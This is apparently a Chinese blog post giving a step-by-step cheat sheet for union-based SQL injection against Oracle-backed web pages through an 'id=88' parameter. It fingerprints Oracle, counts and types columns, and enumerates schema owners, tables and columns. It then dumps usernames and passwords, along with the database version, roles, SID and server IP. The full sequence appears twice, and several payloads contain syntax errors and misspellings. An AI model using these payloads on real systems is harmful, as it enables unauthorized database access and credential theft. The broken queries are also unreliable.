SQL注入--Oracle
2016-10-09 20:34
656 查看
1.判断是否为oracle数据库
id=88 and exists(select *from dual)
id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库
2.查询字段数
order by 4 异常
order by 3 正常 最大列数为3
3.判断字段类型
id=88 union select null,null,null from dual 判断这三个列是否有类型异常,返回正常则继续
id=88 and 1=2 union select 'ss',null,null/null,'ss',null/null,null,'ss' 返回正常判断哪个列数为字符型 可用来显示查询结果
4获取所有数据库的名字(假设第二位为字符型)
id=88 and 1=2 union select null,(select global_name from global_name),null from dual
id=88 and 1=2 union select null, (select sys.database_name from dual),null from dual
id=88 and 1=2 union select null,(select name from v$database),null from dual 几个特殊的库的名字
id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一个库名' and rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一库名'and owner <>'第二个库名'and rownum=1),null from dual
每次查询将前面的库排除掉
5.获取当前库的所有表
id=88 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'and table_name<>'第二个表名' and rownum=1),null from dual
6.查询表的字段名
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名'and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’ and column_name<>'第二个字段名'and rownum=1),null from dual
7.查询字段值
id=88 and 1=2 union select null,username,password from '表名字'--
8.其他重要信息
null,(select banner from sys.v_$version where rownum=1)数据库版本
null,(select * from session_roles where rownum=1)当前用户权限
null,(select name from v$database) 数据库名
null,(select table_name from user_tables where rownum=1)当前库所有表
null,(select member from v$logfile where rownum=1)服务器系统
null,(select utl_inadder.get_host_address from dual)服务器监听IP
null,(select instance_name from v$instance)数据库SID
id=88 and exists(select *from dual)
id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库
2.查询字段数
order by 4 异常
order by 3 正常 最大列数为3
3.判断字段类型
id=88 union select null,null,null from dual 判断这三个列是否有类型异常,返回正常则继续
id=88 and 1=2 union select 'ss',null,null/null,'ss',null/null,null,'ss' 返回正常判断哪个列数为字符型 可用来显示查询结果
4获取所有数据库的名字(假设第二位为字符型)
id=88 and 1=2 union select null,(select global_name from global_name),null from dual
id=88 and 1=2 union select null, (select sys.database_name from dual),null from dual
id=88 and 1=2 union select null,(select name from v$database),null from dual 几个特殊的库的名字
id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一个库名' and rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一库名'and owner <>'第二个库名'and rownum=1),null from dual
每次查询将前面的库排除掉
5.获取当前库的所有表
id=88 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'and table_name<>'第二个表名' and rownum=1),null from dual
6.查询表的字段名
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名'and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’ and column_name<>'第二个字段名'and rownum=1),null from dual
7.查询字段值
id=88 and 1=2 union select null,username,password from '表名字'--
8.其他重要信息
null,(select banner from sys.v_$version where rownum=1)数据库版本
null,(select * from session_roles where rownum=1)当前用户权限
null,(select name from v$database) 数据库名
null,(select table_name from user_tables where rownum=1)当前库所有表
null,(select member from v$logfile where rownum=1)服务器系统
null,(select utl_inadder.get_host_address from dual)服务器监听IP
null,(select instance_name from v$instance)数据库SID
相关文章推荐
- Oracle 使用PreparedStatement防止SQL注入
- Oracle Jdbc 防sql注入
- Oracle的SQL注入
- Oracle 使用PreparedStatement防止SQL注入
- oracle防止sql注入
- oracle 通过jdbc预编译sql防止sql注入。预编译的具体方法
- Oracle 使用PreparedStatement防止SQL注入
- Oracle SQL注入常用语句
- oracle参数查询避免SQL注入
- Oracle学习总结(6)—— SQL注入技术
- 关于利用oracle自带功能防止SQL注入的方法
- Oracle学习总结(6)—— SQL注入技术
- Oracle SQL注入命令总结
- 最近收集的Oracle
- Oracle求求空间使用情况
- Oracle 10G Beta版在Win2000上安装的Bug
- Oracle 条件语句/循环语句
- 详介oracle的RBO/CBO优化器
- oracle里几个不知道的问题
- Oracle 数据库实例启动关闭过程